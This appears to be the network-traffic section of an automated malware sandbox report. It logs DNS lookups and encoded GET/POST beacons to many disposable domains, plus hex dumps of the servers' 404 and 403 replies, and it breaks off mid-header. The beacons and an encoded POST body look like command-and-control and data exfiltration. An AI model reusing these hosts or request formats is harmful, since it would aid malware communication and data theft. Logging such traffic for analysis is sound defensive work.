Source: global traffic; HTTP traffic detected:
    GET /v9ah/?3h=yC3bXnyDZ4yqdl1qCLuqI8XvPsLlvIGaS84o6k5LK0tOudOrulJf3tgJD9KHnC2w/BXUgGDboXn9a2b9lFH1yxqNYPuRfPrUawe2VwTEtds8itq/kxdhNfk=&Ol=yN0LtN-HDTPXX HTTP/1.1
    Host: www.santillo.bet
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
    Accept-Language: en-us
    Connection: close
    User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.9.1.5) Gecko/20091102 Firefox/3.5.5 ( .NET CLR 3.5.30729)
Source: global traffic; HTTP traffic detected:
    GET /xmwd/?Ol=yN0LtN-HDTPXX&3h=IE+rnmKnemgDtsiA8D5STAXs+nTDk69pr8eDsUHYy7apDPgh9p40v/i3nAWVLY2hDfLFviaUsm8qLT6zg1+OTK9FmT+L4AChwwgp3/M3yzjoJwJ2lNnYZDs= HTTP/1.1
    Host: www.esnafus.online
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
    Accept-Language: en-us
    Connection: close
    User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.9.1.5) Gecko/20091102 Firefox/3.5.5 ( .NET CLR 3.5.30729)
Source: global traffic; HTTP traffic detected:
    GET /cf1q/?3h=Au7Zxr9sERBgSOyq6sWX0Xm+S784fSZRk7JANtZrtFINqgeh5LGBoKKy7i8WIDLxVDqalClkjREz1X29sb2m/qDZ/T0gendGAmanUDy32Npyhfc7xsZS61c=&Ol=yN0LtN-HDTPXX HTTP/1.1
    Host: www.sssvip2.shop
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
    Accept-Language: en-us
    Connection: close
    User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.9.1.5) Gecko/20091102 Firefox/3.5.5 ( .NET CLR 3.5.30729)
Source: global traffic; HTTP traffic detected:
    GET /5g1j/?3h=Iw562B7TPAI32gTWbsa7SZB9B1g4T8AuAaaNtg53EDLPQ9knn4W1dXgxSIR1GiDQ5ebaMc+5dfd+z2pa5yiwp35RXETqktnTD0YqfDOBtHcvCUTPdpJ9O6Q=&Ol=yN0LtN-HDTPXX HTTP/1.1
    Host: www.shipley.group
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
    Accept-Language: en-us
    Connection: close
    User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.9.1.5) Gecko/20091102 Firefox/3.5.5 ( .NET CLR 3.5.30729)
Source: global traffic; DNS traffic detected: DNS query: www.goldbracelet.top
Source: global traffic; DNS traffic detected: DNS query: www.pku-cs-cjw.top
Source: global traffic; DNS traffic detected: DNS query: www.ausyva4.top
Source: global traffic; DNS traffic detected: DNS query: www.969-usedcar02.shop
Source: global traffic; DNS traffic detected: DNS query: www.juewucangku.xyz
Source: global traffic; DNS traffic detected: DNS query: www.startsomething.xyz
Source: global traffic; DNS traffic detected: DNS query: www.opro.vip
Source: global traffic; DNS traffic detected: DNS query: www.santillo.bet
Source: global traffic; DNS traffic detected: DNS query: www.esnafus.online
Source: global traffic; DNS traffic detected: DNS query: www.sssvip2.shop
Source: global traffic; DNS traffic detected: DNS query: www.shipley.group
                Source: unknownHTTP traffic detected: POST /k3hn/ HTTP/1.1Host: www.pku-cs-cjw.topAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Encoding: gzip, deflate, brAccept-Language: en-usContent-Type: application/x-www-form-urlencodedCache-Control: max-age=0Content-Length: 199Connection: closeOrigin: http://www.pku-cs-cjw.topReferer: http://www.pku-cs-cjw.top/k3hn/User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.9.1.5) Gecko/20091102 Firefox/3.5.5 ( .NET CLR 3.5.30729)Data Raw: 33 68 3d 51 62 31 39 6b 42 55 6f 6c 5a 5a 78 59 59 74 4a 4e 31 74 49 6c 58 39 39 6a 70 6f 64 70 32 42 55 7a 2b 6e 58 30 4d 79 4c 6e 62 33 33 4e 62 57 4a 42 4d 75 61 4b 64 73 4b 34 65 5a 79 2f 6a 47 49 54 6f 53 4b 78 67 55 64 55 52 56 48 7a 6b 6a 43 37 49 35 4f 72 47 45 6e 76 77 69 4e 4b 54 35 79 6f 37 6d 36 7a 74 6e 4b 7a 4a 47 49 46 51 32 55 72 34 69 42 4d 47 69 6c 61 77 43 42 78 31 33 74 4d 79 6e 59 72 6f 30 47 41 79 79 2f 54 56 39 59 62 61 42 50 49 42 74 49 76 35 4d 56 56 4d 63 35 51 6d 38 32 41 54 70 46 59 5a 39 79 77 4e 39 42 77 6e 32 75 61 48 43 30 4c 57 55 34 4d 47 59 76 32 67 3d 3d Data Ascii: 3h=Qb19kBUolZZxYYtJN1tIlX99jpodp2BUz+nX0MyLnb33NbWJBMuaKdsK4eZy/jGIToSKxgUdURVHzkjC7I5OrGEnvwiNKT5yo7m6ztnKzJGIFQ2Ur4iBMGilawCBx13tMynYro0GAyy/TV9YbaBPIBtIv5MVVMc5Qm82ATpFYZ9ywN9Bwn2uaHC0LWU4MGYv2g==
                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Fri, 10 Jan 2025 17:51:09 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=9vIy347nknzZsF7n8kQFEouund5xCnGKGL9963zsLW7gpdjav5t8iOyZ8SF37shEqquoe%2FXaIjn3y10t4Ff%2FUYfoZXKgmqLu8siwP97th8Rea1qbVS3VG6P8dhfoCvpPz6nxaMgtkA%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8ffe83741dd843b9-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=2262&min_rtt=2262&rtt_var=1131&sent=2&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=462&delivery_rate=0&cwnd=190&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 10 Jan 2025 17:51:39 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=6DdqZy1b9Iu0eSYQrryBoM219Yn3%2FYIQusgeGDqw%2FPThWl6z%2BL2MlvbWu2Voz7JoD%2BZA3v1TAtL0JZobUX49DdyQcC4M8GT6PHiB%2B4PF5QuZBOmFIBQsY33CQMgGpU3MpP8%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8ffe84312dc54328-EWRContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=46143&min_rtt=46143&rtt_var=23071&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=719&delivery_rate=0&cwnd=218&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 66 0d 0a 1f 8b 08 00 00 00 00 00 00 03 00 00 00 ff ff 0d 0a 31 35 38 0d 0a 75 91 41 4b 03 31 10 85 ef 85 fe 87 d1 7b 3b bb b5 22 96 90 83 b6 a2 50 b5 e8 0a 7a 4c 9b 69 13 4c 33 25 3b db 65 ff bd 74 ed 4a 29 78 c9 cb 64 e6 7b 4c 78 ea 62 fa 7a 5f 7c 2d 66 f0 58 3c cf 61 f1 71 37 7f ba 87 cb 01 e2 d3 ac 78 40 9c 16 d3 df ce 68 98 21 ce 5e 2e 75 bf a7 9c 6c 43 ab 64 ac 56 e2 25 90 1e 67 63 78 61 81 07 ae a2 55 f8 fb a8 b0 1d e9 f7 d4 92 6d 73 d0 15 45 a1 a4 95 cb cf 09 97 6b 85 c7 76 bf 07 ef 9c 52 03 6b 4e 20 8e c0 c7 15 c7 3d 45 4f 71 45 43 b5 4c a8 fb bd 45 20 53 12 24 da 71 12 10 e7 4b d8 52 59 9a 0d 81 89 f6 c0 84 ca 52 cb af 39 04 ae 7d dc 80 8f 6b 4e 5b 23 9e 23 08 43 55 76 6e 85 33 f1 1b 1a ae 60 4f a9 81 6d b5 72 17 0a 77 87 a5 c5 2c 03 b5 97 d4 9e 56 7f bc cd 27 0a c5 1e 4b 27 b2 9b 20 d6 75 3d 34 55 d9 ec cd 78 28 bc 43 13 6e c6 d8 8d e1 11 ee 2c de 29 ed 29 9d ba 84 8a ad 6f 68 60 ea 72 10 d9 52 fe 1f 3a 35 42 a7 e0 28 1b 5d 63 96 63 9e 43 96 4f ae f3 c9 d5 ed 19 8a 7f 5f 70 09 f5 82 6b 4a 64 61 d9 c0 a7 72 49 77 a9 08 c5 8d 8f 74 12 83 c2 2e 38 3c 86 fe 03 73 57 13 32 31 02 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 10 Jan 2025 17:51:42 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=AJg1p2ocmgRBzQ9rbfF4RY9zgLdVYL9TVZrmJ17Zv2gCpK%2BNflZ9PdcCY4X6zXU28FlUVD%2FINT0yRmxAUSx2zdcYBcA4p43LZTjElFpUNczrget6kmxHt3o0sm%2BCZtLd3KM%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8ffe84400a37c34d-EWRContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=21348&min_rtt=21348&rtt_var=10674&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=739&delivery_rate=0&cwnd=250&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 31 36 31 0d 0a 1f 8b 08 00 00 00 00 00 00 03 75 91 41 4b 03 31 10 85 ef 85 fe 87 d1 7b 3b bb 65 45 28 21 07 6d 45 a1 6a d1 2d e8 31 6d a6 4d 30 cd 94 ec 6c 97 fd f7 d2 b5 2b 45 f0 92 97 c9 cc f7 98 f0 d4 d5 ec f5 be fc 5c ce e1 b1 7c 5e c0 72 75 b7 78 ba 87 eb 11 e2 d3 bc 7c 40 9c 95 b3 9f ce 64 9c 21 ce 5f ae f5 70 a0 9c ec 43 a7 64 ac 56 e2 25 90 2e b2 02 5e 58 e0 81 eb 68 15 fe 3c 2a ec 46 86 03 b5 66 db 9e 74 43 51 28 69 e5 f2 bf 84 cb b5 c2 73 7b 38 80 77 4e a9 85 2d 27 10 47 e0 e3 86 e3 91 a2 a7 b8 a1 b1 5a 27 d4 c3 c1 32 90 a9 08 12 1d 38 09 88 f3 15 ec a9 aa cc 8e c0 44 7b 62 42 6d a9 e3 b7 1c 02 37 3e ee c0 c7 2d a7 bd 11 cf 11 84 a1 ae 7a b7 d2 99 f8 05 2d d7 70 a4 d4 c2 be de b8 2b 85 87 d3 d2 62 d6 81 ba 4b ea 4e ab 57 6f 8b a9 42 b1 e7 d2 89 1c a6 88 4d d3 8c 4d 5d b5 47 53 8c 85 0f 68 c2 6d 81 fd 18 9e e1 de e2 9d d2 91 d2 a5 4b a8 d9 fa 96 46 a6 a9 46 91 2d e5 ff a1 33 23 74 09 4e b2 c9 0d 66 39 e6 39 64 f9 f4 26 9f 16 93 3f 28 fe 7e c1 25 d4 4b 6e 28 91 85 75 0b 1f ca 25 dd a7 22 14 77 3e d2 45 0c 0a fb e0 f0 1c fa 37 4a b2 8b 95 31 02 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 10 Jan 2025 17:51:44 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=8zJZRyA8oGJV%2BvpWSnvJ4DnZnyq4d8QE6LYC90EY7mXHaI5Khb039SPF1Z0PulEfbtmBL%2BOjGNNxunDkK%2BEvhLbpWU6VSU4yOHa3YCy%2FcQH8KfHG9IouIHGMSnguVW4pim8%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8ffe84507e89c330-EWRContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=22937&min_rtt=22937&rtt_var=11468&sent=4&recv=10&lost=0&retrans=0&sent_bytes=0&recv_bytes=10821&delivery_rate=0&cwnd=233&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 31 36 31 0d 0a 1f 8b 08 00 00 00 00 00 00 03 75 91 41 4b 03 31 10 85 ef 85 fe 87 d1 7b 3b bb 65 45 28 21 07 6d 45 a1 6a d1 2d e8 31 6d a6 4d 30 cd 94 ec 6c 97 fd f7 d2 b5 2b 45 f0 92 97 c9 cc f7 98 f0 d4 d5 ec f5 be fc 5c ce e1 b1 7c 5e c0 72 75 b7 78 ba 87 eb 11 e2 d3 bc 7c 40 9c 95 b3 9f ce 64 9c 21 ce 5f ae f5 70 a0 9c ec 43 a7 64 ac 56 e2 25 90 2e b2 02 5e 58 e0 81 eb 68 15 fe 3c 2a ec 46 86 03 b5 66 db 9e 74 43 51 28 69 e5 f2 bf 84 cb b5 c2 73 7b 38 80 77 4e a9 85 2d 27 10 47 e0 e3 86 e3 91 a2 a7 b8 a1 b1 5a 27 d4 c3 c1 32 90 a9 08 12 1d 38 09 88 f3 15 ec a9 aa cc 8e c0 44 7b 62 42 6d a9 e3 b7 1c 02 37 3e ee c0 c7 2d a7 bd 11 cf 11 84 a1 ae 7a b7 d2 99 f8 05 2d d7 70 a4 d4 c2 be de b8 2b 85 87 d3 d2 62 d6 81 ba 4b ea 4e ab 57 6f 8b a9 42 b1 e7 d2 89 1c a6 88 4d d3 8c 4d 5d b5 47 53 8c 85 0f 68 c2 6d 81 fd 18 9e e1 de e2 9d d2 91 d2 a5 4b a8 d9 fa 96 46 a6 a9 46 91 2d e5 ff a1 33 23 74 09 4e b2 c9 0d 66 39 e6 39 64 f9 f4 26 9f 16 c5 1f 14 7f bf e0 12 ea 25 37 94 c8 c2 ba 85 0f e5 92 ee 53 11 8a 3b 1f e9 22 06 85 7d 70 78 0e fd 1b 8b 0b 0a b2 31 02 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 10 Jan 2025 17:51:47 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=KhOXLFHlqVpL8PAE1%2B8LR6Nao0YmNvSLmm%2F%2FOJHUqvhmlBWWTz9qrg13OQ9no8zUlN797BOQTl1bIWpGfQ5FMDlOfZj0404FX%2FGMJuzg0uCAFxa%2BxtR%2FHAt9SLqMhVzbBMw%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8ffe8460be6d7cf0-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1971&min_rtt=1971&rtt_var=985&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=457&delivery_rate=0&cwnd=228&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 32 63 32 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 20 53 6f 72 72 79 20 66 6f 72 20 74 68 65 20 69 6e 63 6f 6e 76 65 6e 69 65 6e 63 65 2e 3c 62 72 2f 3e 0d 0a 50 6c 65 61 73 65 20 72 65 70 6f 72 74 20 74 68 69 73 20 6d 65 73 73 61 67 65 20 61 6e 64 20 69 6e 63 6c 75 64 65 20 74 68 65 20 66 6f 6c 6c 6f 77 69 6e 67 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 20 74 6f 20 75 73 2e 3c 62 72 2f 3e 0d 0a 54 68 61 6e 6b 20 79 6f 75 20 76 65 72 79 20 6d 75 63 68 21 3c 2f 70 3e 0d 0a 3c 74 61 62 6c 65 3e 0d 0a 3c 74 72 3e 0d 0a 3c 74 64 3e 55 52 4c 3a 3c 2f 74 64 3e 0d 0a 3c 74 64 3e 68 74 74 70 3a 2f 2f 77 77 77 2e 61 75 73 79 76 61 34 2e 74 6f 70 2f 61 6c 37 34 2f 3f 4f 6c 3d 79 4e 30 4c 74 4e 2d 48 44 54 50 58 58 26 61 6d 70 3b 33 68 3d 31 42 6a 73 65 34 61 61 75 
43 6d 6f 39 37 4e 34 55 7a 4b 44 30 61 52 38 6d 33 36 66 43 4d 56 41 55 77 54 4a 55 36 75 36 45 2b 42 68 73 6f 66 36 55 48 78 64 79 32 52 71 62 79 52 67 74 62 74 37 67 4c 4b 50 67 68 55 38 6f 71 6e 72 34 6f Data Ascii: 2c2<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center> Sorry for the inconvenience.<br/>Please report this message and include the following information to us.<br/>Thank you very much!</p><table><tr><td>URL:</td><td>http://www.ausyva4.top/al74/?Ol=yN0LtN-HDTPXX&amp;3h=1Bjse4aauCmo97N4UzKD0aR8m36fCMVAUwTJU6u6E+Bhsof6UHxdy2RqbyRgtbt7gLKPghU8oqnr4o
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 10 Jan 2025 17:52:20 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 10 Jan 2025 17:52:23 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 10 Jan 2025 17:52:25 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 10 Jan 2025 17:52:28 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 10 Jan 2025 17:52:34 GMTContent-Type: text/htmlContent-Length: 419Connection: closeETag: "6642ed07-1a3"
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 10 Jan 2025 17:52:37 GMTContent-Type: text/htmlContent-Length: 419Connection: closeETag: "6642ed07-1a3"
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 10 Jan 2025 17:52:39 GMTContent-Type: text/htmlContent-Length: 419Connection: closeETag: "6642ecf7-1a3"
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 10 Jan 2025 17:52:42 GMTContent-Type: text/htmlContent-Length: 419Connection: closeETag: "6642ed07-1a3"
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 10 Jan 2025 17:52:48 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeLink: <https://santillo.bet/wp-json/>; rel="https://api.w.org/"Expires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Vary: Accept-Encodinghost-header: c2hhcmVkLmJsdWVob3N0LmNvbQ==X-Newfold-Cache-Level: 2Referrer-Policy: no-referrer-when-downgradeX-Endurance-Cache-Level: 2X-nginx-cache: WordPressCF-Cache-Status: DYNAMICSet-Cookie: 